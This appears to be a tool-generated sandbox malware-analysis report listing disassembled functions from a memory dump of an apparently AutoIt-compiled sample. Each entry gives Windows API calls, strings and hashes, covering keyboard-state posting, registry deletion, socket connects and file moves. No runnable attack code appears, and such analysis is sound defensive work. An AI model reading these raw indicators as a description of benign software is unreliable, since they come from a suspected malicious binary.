Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 17c29938eaec4545fcd59bb6c6ee40f5eb94d71b39a75cd40285380d75f9bc0d
Instruction ID: 0b851fbde290c4f457600d4952614b5d0179ac84c62ae7c221f25e3c55bba0ac
Opcode Fuzzy Hash: 17c29938eaec4545fcd59bb6c6ee40f5eb94d71b39a75cd40285380d75f9bc0d
Instruction Fuzzy Hash: 6761CD71A01659DFCF14EF65C8889AEBBF5FF49310F148069E819AB751CB38AD41CB90

Function 007D0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 007D0F8C
GetKeyboardState.USER32(?), ref: 007D0FA1
SetKeyboardState.USER32(?), ref: 007D1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 007D1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 007D104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 007D1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 007D10B8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9d9ef461a67a316de086c50f57335a8a95e0510f3500c7d3bab1d221a136e822
Instruction ID: c57a0d8dd5abcc9f2dfb8e71955e07eadc3499286be6f4da9e2943ccac00369a
Opcode Fuzzy Hash: 9d9ef461a67a316de086c50f57335a8a95e0510f3500c7d3bab1d221a136e822
Instruction Fuzzy Hash: 3851E1A06047D57DFB3653348C49BBABFB96B06304F48858AE1D486AC2C29DECD8D761

Function 007D0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 007D0DA5
GetKeyboardState.USER32(?), ref: 007D0DBA
SetKeyboardState.USER32(?), ref: 007D0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007D0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007D0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007D0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007D0EC9

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ebbff8921978b4261c91d2d26cf11770e343eaf073c6a9f3e5c2cad698324380
Instruction ID: d03a00a5f16c8b3249c0c8c39beeeb632a6aa76d63732795ed33854a252997f9
Opcode Fuzzy Hash: ebbff8921978b4261c91d2d26cf11770e343eaf073c6a9f3e5c2cad698324380
Instruction Fuzzy Hash: 5551E7A06447D57DFB3293748C45B7ABFB96F06300F08988EE1D4466C2D799EC94D7A0

Function 007D55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 007D560A
_wcsncpy.LIBCMT ref: 007D563F
_wcsncpy.LIBCMT ref: 007D5671
_wcsncpy.LIBCMT ref: 007D56A4
_wcsncpy.LIBCMT ref: 007D56E6
_wcsncpy.LIBCMT ref: 007D5720
_wcsncpy.LIBCMT ref: 007D574F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: a6359cefc825e017601cf427de2440ace0c1b81dfd85bd0162d00bf5b8803ef0
Instruction ID: 9680b01688fa00b2cba294f74281a1657d23a9153dbf080cc3491252d79f6b0d
Opcode Fuzzy Hash: a6359cefc825e017601cf427de2440ace0c1b81dfd85bd0162d00bf5b8803ef0
Instruction Fuzzy Hash: 1D415675C10614B6CF11FBB4DC4AACFB7B89F05310F508566E514E3222FA38E656C7A6

Function 007D3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007D466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3697,?), ref: 007D468B

Part of subcall function 007D466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3697,?), ref: 007D46A4

lstrcmpiW.KERNEL32(?,?), ref: 007D36B7
_wcscmp.LIBCMT ref: 007D36D3
MoveFileW.KERNEL32(?,?), ref: 007D36EB
_wcscat.LIBCMT ref: 007D3733
SHFileOperationW.SHELL32(?), ref: 007D379F

Strings

\*.*, xrefs: 007D372D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: e6d5a8ec5be9ded980051cbf50373614a777e643741bcce6e4f7c570da6d9fc9
Instruction ID: 7004e59733dca6cdf5b71c4165b336137bcef5c7903303fb6c815344c8c1405e
Opcode Fuzzy Hash: e6d5a8ec5be9ded980051cbf50373614a777e643741bcce6e4f7c570da6d9fc9
Instruction Fuzzy Hash: 524191B1508344AEC751EF64D4499DF77F8AF89380F00486FF49AC3251EA38D689C756

Function 007F7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7351
IsMenu.USER32(?), ref: 007F7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F73B1
DrawMenuBar.USER32 ref: 007F73C4

Strings

0, xrefs: 007F729E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 8c9302da4f52813e0f70874829bf37c0d139e5c3b91fe3683a5c15f0f2668beb
Instruction ID: 41472d221e1e819f4b309c60c13d402d15500a43d27577e772a73aea2adf8fb3
Opcode Fuzzy Hash: 8c9302da4f52813e0f70874829bf37c0d139e5c3b91fe3683a5c15f0f2668beb
Instruction Fuzzy Hash: 09411375A04248EFDB24DF54D884AAABBF9FF08350F148529FE15AB350D738AD50DBA0

Function 007F0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007F0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F0FFE
FreeLibrary.KERNEL32(00000000), ref: 007F10B5

Part of subcall function 007F0FA5: RegCloseKey.ADVAPI32(?), ref: 007F101B
Part of subcall function 007F0FA5: FreeLibrary.KERNEL32(?), ref: 007F106D
Part of subcall function 007F0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007F1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 007F1058

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 4201cf4ef8cc8e16ec3860f9aa8b203e5a4163d40eb3557a041d50a923e7abc1
Instruction ID: c745636a76a8e32c5efa1dbf8b7c62730b56b691dd381cca209b42c53fc199b4
Opcode Fuzzy Hash: 4201cf4ef8cc8e16ec3860f9aa8b203e5a4163d40eb3557a041d50a923e7abc1
Instruction Fuzzy Hash: A731197190110DFFDB25DB94DC89AFEB7BCEF08310F50416AE601E2251EA789E859AA4

Function 007F62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007F62EC
GetWindowLongW.USER32(010C5DB0,000000F0), ref: 007F631F
GetWindowLongW.USER32(010C5DB0,000000F0), ref: 007F6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007F6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007F63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 007F63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007F63DB

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 6db60183bf77b3e0d4e922a27ea007f111bcda50b0cc141c1de4adba4527211b
Instruction ID: 35685a1b608bc56b9ac2f95f76faa117d5b38681e8a3c90a4f9e067b97934afa
Opcode Fuzzy Hash: 6db60183bf77b3e0d4e922a27ea007f111bcda50b0cc141c1de4adba4527211b
Instruction Fuzzy Hash: 9D31FE35644258EFDB208F18DC85F6937E1BF4A714F1941A8F611CB2B2CB7AA840DB51

Function 007CDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CDB54
SysAllocString.OLEAUT32(00000000), ref: 007CDB57
SysAllocString.OLEAUT32(?), ref: 007CDB75
SysFreeString.OLEAUT32(?), ref: 007CDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 007CDBA3
SysAllocString.OLEAUT32(?), ref: 007CDBB1

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9fc33dd078b3c0640406803407f9f8d52a40ff5a95267bb7ec7474b83a3575d1
Instruction ID: aa4c41120d84e4c0c5f04f74656b617a6fce0acee0dec5804205001042538db5
Opcode Fuzzy Hash: 9fc33dd078b3c0640406803407f9f8d52a40ff5a95267bb7ec7474b83a3575d1
Instruction Fuzzy Hash: E4214F76600219AF9F20DFA8DC88DBB77ACEF09360B15857DFD14DB250DA789C4187A8

Function 007E6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007E7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E7DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007E61C6
WSAGetLastError.WSOCK32(00000000), ref: 007E61D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E620E
connect.WSOCK32(00000000,?,00000010), ref: 007E6217
WSAGetLastError.WSOCK32 ref: 007E6221
closesocket.WSOCK32(00000000), ref: 007E624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E6263

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: d8d5753e6cc3b5172456bd1c3eca2c7dc1cba998a56151b74dd6fccf87da6112
Instruction ID: d138b64852ae06e010d60beaf82c3e36b9d0a769b6a240a27f821492c812f1e1
Opcode Fuzzy Hash: d8d5753e6cc3b5172456bd1c3eca2c7dc1cba998a56151b74dd6fccf87da6112
Instruction Fuzzy Hash: FD31A471601218ABDF10AF25CC89BBD77ADEF59790F048069FA0597291CB78AC04CB61

Function 007CF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 007CF671
__wcsnicmp.LIBCMT ref: 007CF692
__wcsnicmp.LIBCMT ref: 007CF6AC

Strings

#notrayicon, xrefs: 007CF669
#requireadmin, xrefs: 007CF68C
#OnAutoItStartRegister, xrefs: 007CF6A6

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: ef51bd3377bc0a27b78e0bb860aad049e59ef5116265f3e530ff202085679e80
Instruction ID: 40dd68e9fe21fd128de99487bb8f8b69e964b5f01e9e3eeafa6b6593661ae010
Opcode Fuzzy Hash: ef51bd3377bc0a27b78e0bb860aad049e59ef5116265f3e530ff202085679e80
Instruction Fuzzy Hash: 6B214672204611EAD620BB34AC06FA773DAEF55350F50803EF89A97191EB9D9D42C395

Function 007CDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CDC2F
SysAllocString.OLEAUT32(00000000), ref: 007CDC32
SysAllocString.OLEAUT32 ref: 007CDC53
SysFreeString.OLEAUT32 ref: 007CDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 007CDC76
SysAllocString.OLEAUT32(?), ref: 007CDC84

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 43daf7600f1d7670ab13b1b631c311a1b5cba66eb937ed7dead4a3adb9bc332a
Instruction ID: 0aad4ddeaf5ac05100be59a8331605b06ba5927c7123aa478e1ec33bc4da6186
Opcode Fuzzy Hash: 43daf7600f1d7670ab13b1b631c311a1b5cba66eb937ed7dead4a3adb9bc332a
Instruction Fuzzy Hash: 96211276604204AF9B20DFA8DC89DBB77ACEF09360B14813DF915CB261DA78DC41C768

Function 007F75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007F7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007F763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007F764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007F7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007F7665

Strings

Msctls_Progress32, xrefs: 007F7603

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 364bc33051b32f5c6ccf4cca29556df25cac32272f5934f4187937b8823064bd
Instruction ID: efb422e4f6ca93084131e68524067a52aabd6cddab9df65e601e00942f7c0c2f
Opcode Fuzzy Hash: 364bc33051b32f5c6ccf4cca29556df25cac32272f5934f4187937b8823064bd
Instruction Fuzzy Hash: 7E1181B111011DBEEF159F64CC85EF77F6DEF08798F014114BB04A6150CA769C21DBA4

Function 00799AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00799AE6

Part of subcall function 00793187: EncodePointer.KERNEL32(00000000), ref: 0079318A
Part of subcall function 00793187: __initp_misc_winsig.LIBCMT ref: 007931A5
Part of subcall function 00793187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00799EA0
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00799EB4
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00799EC7
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00799EDA
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00799EED
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00799F00
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00799F13
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00799F26
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00799F39
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00799F4C
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00799F5F
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00799F72
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00799F85
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00799F98
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00799FAB
Part of subcall function 00793187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00799FBE

__mtinitlocks.LIBCMT ref: 00799AEB
__mtterm.LIBCMT ref: 00799AF4

Part of subcall function 00799B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00799AF9,00797CD0,0082A0B8,00000014), ref: 00799C56
Part of subcall function 00799B5C: _free.LIBCMT ref: 00799C5D
Part of subcall function 00799B5C: DeleteCriticalSection.KERNEL32(0082EC00,?,?,00799AF9,00797CD0,0082A0B8,00000014), ref: 00799C7F

__calloc_crt.LIBCMT ref: 00799B19
__initptd.LIBCMT ref: 00799B3B
GetCurrentThreadId.KERNEL32 ref: 00799B42

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 4c537014953f294eb9dec565c669e30bdb484158c40bd579f374c1e7e9fa6fa7
Instruction ID: 9d34913611a1d434fa9764f7a5433f86b4b86a7feffbcfd1dc8d35d6d124ab87
Opcode Fuzzy Hash: 4c537014953f294eb9dec565c669e30bdb484158c40bd579f374c1e7e9fa6fa7
Instruction Fuzzy Hash: 61F09672609711AAFE34777DBC0B64A3790EF02734F20861EF650C51D2FF1D88418165

Function 0079406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00793F85), ref: 00794085
GetProcAddress.KERNEL32(00000000), ref: 0079408C
EncodePointer.KERNEL32(00000000), ref: 00794097
DecodePointer.KERNEL32(00793F85), ref: 007940B2

Strings

combase.dll, xrefs: 00794080
RoUninitialize, xrefs: 00794074

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: f0acf60d6ef72d4bccec10332ed04ff748a4738558a7e25e25a9a31a90986c30
Instruction ID: 4dc1be5982e96ff7359bf00f9c3173eec5ec64e7e43d275f90552d8769a8df44
Opcode Fuzzy Hash: f0acf60d6ef72d4bccec10332ed04ff748a4738558a7e25e25a9a31a90986c30
Instruction Fuzzy Hash: 6FE0B670581304EFEF60AF65EC0DB193BA4BF44742F108826F511E11A0CFBE4640EA18

Function 007D64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D660B
_memmove.LIBCMT ref: 007D6546

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

_memmove.LIBCMT ref: 007D65B9
_memmove.LIBCMT ref: 007D66A0
_memmove.LIBCMT ref: 007D66B9
_memmove.LIBCMT ref: 007D66D5

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

